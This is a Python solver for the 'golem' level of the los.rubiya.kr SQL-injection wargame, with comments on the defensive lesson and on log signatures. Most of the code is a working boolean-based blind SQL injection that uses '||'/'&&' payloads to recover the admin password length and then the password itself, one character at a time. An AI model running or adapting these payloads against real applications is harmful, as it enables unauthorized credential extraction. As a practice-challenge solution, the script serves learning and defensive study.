# Boolean-based blind SQL injection solver for one level of the
# los.rubiya.kr wargame (the "golem" challenge named in URL below).
#
# The server-side query is not shown on this page. The probes below can only
# work if the `pw` request parameter is concatenated into a SQL string, so the
# lesson for the defending side is the usual one: bind `pw` as a query
# parameter instead of filtering keywords. Each probe differs from the previous
# one only by a number or a single character, so a run appears in access logs
# as a long series of near-identical requests against one parameter.
import requests

password = ''
password_length = 0
URL = 'https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php'
headers = {'Content-Type': 'application/json; charset=utf-8'}
# The session cookie is a credential: keep the placeholder in shared copies
# and supply the real value only at run time.
cookies = {'PHPSESSID': 'INSERT_YOUR_COOKIE_HERE'}


def _greets_admin(pw_value):
    """Send *pw_value* as the ``pw`` parameter and report the page's answer.

    Returns True when the response body contains "Hello admin", which the
    script treats as "the injected condition was true".
    """
    # NOTE(review): no timeout is passed, so a stalled connection blocks the run.
    reply = requests.get(URL, params={'pw': pw_value}, headers=headers, cookies=cookies)
    return "Hello admin" in reply.text


# Stage 1: find the length. The condition `length(pw) < N` first becomes true
# at N = length + 1, hence the `- 1`. The `substring(id, 1, 1) < 'b'` part
# restricts the match to ids whose first character sorts before 'b'
# (presumably the admin row -- the table contents are not shown here).
for candidate_len in range(100):
    probe = '\' || substring(id, 1, 1) < \'b\' && length(pw) < ' + str(candidate_len) + '#'
    if not _greets_admin(probe):
        continue
    password_length = candidate_len - 1
    print("admin's password length is {}".format(password_length))
    break

if password_length < 1:
    print("Password length unknown")
    exit()

# Stage 2: recover one character per outer iteration by comparing a growing
# prefix of pw against `password + candidate`. The first candidate that makes
# the prefix sort strictly lower is one code point past the real character,
# hence `code_point - 1`.
# NOTE(review): if no candidate matches for a position, `password` is not
# extended and the final message below is silently skipped.
for prefix_len in range(1, password_length + 1):
    for code_point in range(ord('0'), ord('z') + 1):
        probe = ('\' || substring(id, 1, 1) < \'b\' && substring(pw,1,'
                 + str(prefix_len) + ') < \'' + password
                 + chr(code_point).capitalize() + '\'#')
        if _greets_admin(probe):
            password += chr(code_point - 1)
            print(password)
            break

# Candidates are capitalised before comparison, so the script cannot tell the
# letter case of the result; it reports both spellings.
if len(password) == password_length:
    print("Got it. Password is {} or {}.".format(password.upper(), password.lower()))